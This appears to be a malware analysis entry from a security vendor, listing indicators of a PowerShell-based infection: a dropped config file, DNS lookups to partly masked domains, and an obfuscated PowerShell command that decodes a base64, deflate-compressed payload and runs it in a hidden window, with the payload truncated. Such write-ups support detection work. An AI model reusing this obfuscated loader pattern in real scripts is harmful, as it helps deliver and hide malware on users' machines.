Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ( nEW-obJeCt SYSTEM.IO.COMpreSsION.dEFlateStreaM([SYStEm.Io.mEmORyStREam] [SYstEm.coNverT]::frOMbAse64stRIng( 'RVDbagIxEP2VfQhEsZv0oVAwLAi1F6QthUXE0pdJdupGs0nMjm5F/PeuUizM0zlzLjPMfj4XHrs86DUay...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK pr###rplano.org
- DNS ASK av##ant.com
- DNS ASK mu##thai.pl
- DNS ASK jm###sical.jp
- DNS ASK na###amicky.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ( nEW-obJeCt SYSTEM.IO.COMpreSsION.dEFlateStreaM([SYStEm.Io.mEmORyStREam] [SYstEm.coNverT]::frOMbAse64stRIng( 'RVDbagIxEP2VfQhEsZv0oVAwLAi1F6QthUXE0pdJdupGs0nMjm5F/PeuUizM0zlzLjPMfj4XHrs86DUay... (with a hidden window)